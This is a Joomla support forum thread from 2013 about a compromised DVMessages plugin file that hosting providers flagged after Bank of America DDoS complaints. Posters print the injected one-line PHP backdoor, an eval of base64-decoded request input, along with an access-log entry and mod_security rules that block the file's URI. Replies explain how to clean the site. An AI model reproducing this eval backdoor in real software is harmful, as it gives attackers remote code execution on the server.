dvmessages.php is being reported as phishing file?
Moderators: mandville, General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sun Jan 20, 2013 2:45 pm
dvmessages.php is being reported as phishing file?
Is dvmessages.php a valid joomla file? My host is claiming abuse notices from Bank of America and we have double checked everything and have not found any updated files...
We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find
We did find a few of the following in the raw logs...
184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
We currently using Akeeba admin to turn off site temporarily
so if you can tell us how to get loggin back on and what else i should check...
thanks
We did notice that the joomla error logs are not being populate as of recently...not sure how to get that going again but the path in site config seems find
We did find a few of the following in the raw logs...
184.173.241.57 - - [20/Feb/2013:15:07:23 +0000] "POST /plugins/system/dvmessages/dvmessages.php?action=status HTTP/1.0" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
We currently using Akeeba admin to turn off site temporarily
so if you can tell us how to get loggin back on and what else i should check...
thanks
-
- Joomla! Fledgling
- Posts: 4
- Joined: Sat Feb 23, 2013 9:47 am
Re: dvmessages.php is being reported as phishing file?
I have sort of the same question. The server that we have contract with, send us an email.
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,
It claims that 'dvmessages.php' in 'plugins/system/dvmessages.php' path is a malware. Do you have any experience about this?
I 'm looking forward to your answers.
Regards,
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: dvmessages.php is being reported as phishing file?
is this an extension plugin for http://extensions.joomla.org/extensions ... ames/10999
what are the contents of the file
as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host
what are the contents of the file
as for your logging issues, try and delete the current log file and see if that will restart it. check the logging settings with your host
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- pera
- Joomla! Apprentice
- Posts: 37
- Joined: Wed Aug 24, 2005 5:31 pm
- Location: Sweden
- Contact:
Re: dvmessages.php is being reported as phishing file?
this is second time I get notice from
Abuse Team
Bank of America
The code of the file is:
The abuse team advice me to check with:
curl -A "Mozilla/4.0" -iL [URL]
I get
Any advice?
Abuse Team
Bank of America
The code of the file is:
Code: Select all
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
jimport( 'joomla.application.component.helper' );
class plgSystemDVMessages extends JPlugin
{
var $message;
function plgSystemDVMessages(& $subject, $config) {
parent::__construct($subject, $config);
}
function onAfterInitialise()
{
global $_PROFILER, $mainframe, $database, $_SESSION;
$plugin =& JPluginHelper::getPlugin('system', 'dvmessages');
$pluginParams = new JParameter( $plugin->params );
$document = &JFactory::getDocument();
$temps = $mainframe->getMessageQueue();
if ($temps) {
foreach($temps as $temp) {
if ($temp['message'] != '') {
$messages = $temp;
}
}
}
if ($messages) {
if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) ||
!$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) {
$type = '';
if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) {
$type = 'info';
} elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) {
$type = 'alert';
} elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) {
$type = 'error';
} elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) {
$type = 'info';
}
if ($type != '') {
JHTML::_('behavior.mootools');
$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js');
$document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js');
$document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js');
$document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css');
$document->addScriptDeclaration("
jQuery.noConflict();
jQuery(document).ready(function(){
Sexy.$type('".addslashes($messages['message'])."');
});
");
if ($pluginParams->get('hide_css', 1)) {
$document->addScriptDeclaration("
jQuery.noConflict();
jQuery(document).ready(function(){
document.getElementById('system-message').style.display = 'none';
});
");
}
}
}
}
return true;
}
}
curl -A "Mozilla/4.0" -iL [URL]
I get
Code: Select all
[root@srv5 dvmessages]# curl -A "Mozilla/4.0" -iL http://www.xxx/plugins/system/dvmessages/dvmessages.php
HTTP/1.1 200 OK
Date: Tue, 26 Feb 2013 14:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.20
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
Pera
http://winstart.com
http://winstart.com
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Feb 26, 2013 6:37 pm
- Location: London, UK
Re: dvmessages.php is being reported as phishing file?
Hello,
Oh so I`m not the only one having this problem then
I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?
Now when I`m checking plugins folder there is no sign of dvmessages. How weird?
Oh so I`m not the only one having this problem then
I got a message today from my host stating there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. Can not recall installing mentioned extension. Is it possible it came with anything else?
Now when I`m checking plugins folder there is no sign of dvmessages. How weird?
- ionut
- Joomla! Ace
- Posts: 1264
- Joined: Thu May 27, 2010 1:00 pm
- Location: EU
Re: dvmessages.php is being reported as phishing file?
@pera the first line for sure doesn't look nice.
Code: Select all
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
-
- Joomla! Fledgling
- Posts: 1
- Joined: Tue Feb 26, 2013 10:25 pm
Re: dvmessages.php is being reported as phishing file?
My hosting provider just sent me a similar warning, is a cyber attack? , I see nothing strange in the code ... Please anyone can tell me where is the attack?
- pera
- Joomla! Apprentice
- Posts: 37
- Joined: Wed Aug 24, 2005 5:31 pm
- Location: Sweden
- Contact:
Re: dvmessages.php is being reported as phishing file?
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
But on the "infected" dvmessages.php
This old plugin for Joomla 1.5... best is to not use it or?
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
Code: Select all
<?php
/**
*/
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
Code: Select all
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
Pera
http://winstart.com
http://winstart.com
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: dvmessages.php is being reported as phishing file?
Well obviously (based on posted code) the code is now part of a larger hack with likely more files installed somewhere on the site.
My advice is to disable, and completely remove all traces of the plugin and also your (everyone jumping on with a me too) going to have to follow the advice and procedures here: http://forum.joomla.org/viewtopic.php?f=621&t=582854 in order to properly remove the hack, clean the site(s).
I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the sites insecurity, but until you know for sure don't use it.
My advice is to disable, and completely remove all traces of the plugin and also your (everyone jumping on with a me too) going to have to follow the advice and procedures here: http://forum.joomla.org/viewtopic.php?f=621&t=582854 in order to properly remove the hack, clean the site(s).
I would NOT install or use the plugin after you have cleaned the site. It may or may not be the source of the sites insecurity, but until you know for sure don't use it.
PhilD
-
- Joomla! Fledgling
- Posts: 1
- Joined: Fri Mar 08, 2013 2:43 am
Re: dvmessages.php is being reported as phishing file?
This is definitely part of a larger effort. This is a very dangerous hack that is much, much larger than Bank of America and all administrators should remove this plugin and follow the instructions from PhilD above. Additionally, if you administrate your own server (i.e. a VPS, dedicated server), then you should also secure your temp directory (and also your Joomla temp directory, if different from your system temp). Below is an example on how you might be able to do that.
http://www.techrepublic.com/blog/openso ... -linux/171
http://www.techrepublic.com/blog/openso ... -linux/171
-
- Joomla! Fledgling
- Posts: 1
- Joined: Thu Mar 21, 2013 12:27 pm
Re: dvmessages.php is being reported as phishing file?
your server is now part of a botnet if you have this file (or others)
http://www.prolexic .com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html
itsokbronoproblem botnet uses these files ...
If you have these files on your Joomla (or wordpress) then your installation has been comprimised by the automated attack tools the botnet uses,, this would mean you have old versions of Joomla or wordpress installed.
You need to update Joomla / Wordpress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / comprimised back doors.
http://www.prolexic .com/news-events-pr-threat-advisory-ddos-itsoknoproblembro.html
itsokbronoproblem botnet uses these files ...
If you have these files on your Joomla (or wordpress) then your installation has been comprimised by the automated attack tools the botnet uses,, this would mean you have old versions of Joomla or wordpress installed.
You need to update Joomla / Wordpress to the most recent versions, remove any components / plugins that are not being used, then audit all files uploaded to your hosting account for malicious changes / comprimised back doors.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).
According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
Code: Select all
change
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
to
defined( '_JEXEC' ) or die( 'Restricted access' );
-
- Joomla! Intern
- Posts: 80
- Joined: Fri Jul 20, 2007 2:57 pm
- Location: Pattaya & Surin/Thailand
Re: dvmessages.php is being reported as phishing file?
skate323k137 wrote:This botnet has been firing up again the last couple days. Tons of joomla sites are being used to DDoS Bank of America.
According to access logs on affected servers, It looks like the malicious dvmessages.php files are being edited/uploaded using com_installer. If you have an infected dvmessages file that contains the bad eval statement, fix it:
The infection itself means that either your joomla install is outdated and vulnerable (J1.5) or your administrator password was compromised. Upgrade your software and change your (super)Administrator password(s).Code: Select all
change defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id']))); to defined( '_JEXEC' ) or die( 'Restricted access' );
So, we're all in the same boat ... Three of my sites have been attacked and my host company sent me several complaints from Bank of America. Also on my sites plugins/system/dvsmessages.php was mentioned every time. I have now changed the parameters of all three files, but I don't think this will change much. My joomla install is marked as updated, except on one site where I have to update manually.
Sorry to ask: "Upgrade your software" >> which software, please?
This is what my dvmessages,php file contains now:
params ); $document = &JFactory::getDocument(); $temps = $mainframe->getMessageQueue(); if ($temps) { foreach($temps as $temp) { if ($temp['message'] != '') { $messages = $temp; } } } if ($messages) { if($mainframe->isSite() && ($pluginParams->get('front_enable', 1)) || !$mainframe->isSite() && ($pluginParams->get('admin_enable', 1))) { $type = ''; if (($messages['type'] == 'notice') && ($pluginParams->get('show_notice', 1))) { $type = 'info'; } elseif (($messages['type'] == 'warning') && ($pluginParams->get('show_warning', 1))) { $type = 'alert'; } elseif (($messages['type'] == 'error') && ($pluginParams->get('show_error', 1))) { $type = 'error'; } elseif (($messages['type'] == 'message') && ($pluginParams->get('show_message', 1))) { $type = 'info'; } if ($type != '') { JHTML::_('behavior.mootools'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.min.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/jquery.easing.1.3.js'); $document->addScript(JURI::Root() . 'plugins/system/SEO/SEObox.v1.2.jquery.js'); $document->addStyleSheet(JURI::Root() . 'plugins/system/SEO/SEObox.css'); $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ Sexy.$type('".addslashes($messages['message'])."'); }); "); if ($pluginParams->get('hide_css', 1)) { $document->addScriptDeclaration(" jQuery.noConflict(); jQuery(document).ready(function(){ document.getElementById('system-message').style.display = 'none'; }); "); } } } } return true; } }
Last edited by Sampao on Thu Mar 28, 2013 5:24 pm, edited 1 time in total.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
The only one of these I tracked down in domlogs tracked to com_installer. That should have been patched a long time ago. Are you in a shared hosting environment like on a cPanel server with other customers? If so you should ask your host if they've applied a patch to prevent cross-account symbolic links.
If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IP's that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:
Change domain.com to the site being attacked. If it affects several sites just make it a one-line rule:
If you have root access you should install configserver firewall and mod_security. Configserver firewall will block IP's that trip mod_security more than five times. If you make a modsec rule that denies the URI, the bots trying to hit it will be banned. Sometimes after you clean the file the bots still try to access it for days causing high server load. Put this in modsec2.user.conf or one of your first includes files referenced in that file:
Code: Select all
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "chain,id:1234942,msg:dvmessages"
SecRule SERVER_NAME "domain.com"
Code: Select all
SecRule REQUEST_URI "/plugins/system/dvmessages.php" "id:1234943,msg:dvmessages"
-
- Joomla! Intern
- Posts: 80
- Joined: Fri Jul 20, 2007 2:57 pm
- Location: Pattaya & Surin/Thailand
Re: dvmessages.php is being reported as phishing file?
to skate323k137:
was that last message for me? If yes, I can't follow your instructions, honestly.
was that last message for me? If yes, I can't follow your instructions, honestly.
-
- Joomla! Apprentice
- Posts: 10
- Joined: Thu May 20, 2010 12:52 am
Re: dvmessages.php is being reported as phishing file?
It was, though it will help anyone in this situation if they are on a linux server. Are you hosted on a shared server, or do you have root access to your hosting environment (i.e. VPS or Dedicated server?)
-
- Joomla! Fledgling
- Posts: 2
- Joined: Mon Apr 01, 2013 7:03 am
Re: dvmessages.php is being reported as phishing file?
The original file from
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
what does smh mean
http://extensions.joomla.org/extensions ... ames/10999
dvmessages.php
what does smh mean
- PseudZ
- Joomla! Apprentice
- Posts: 35
- Joined: Thu Jul 07, 2011 11:58 am
- Location: South Africa
Re: dvmessages.php is being reported as phishing file?
What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
Thanks
- horus_68
- Joomla! Ace
- Posts: 1495
- Joined: Sun Sep 25, 2005 5:29 am
- Location: Porto - Portugal
Re: dvmessages.php is being reported as phishing file?
The extension reported here isPseudZ wrote:What extension has been infected and should be removed? It seems to have been removed from the extensions directory and I cannot see which one it is.
Thanks
DVMessages - http://archive.extensions.joomla.org/ex ... ames/10999
Portuguese Joomla Community / Joomla pt-PT Translation Team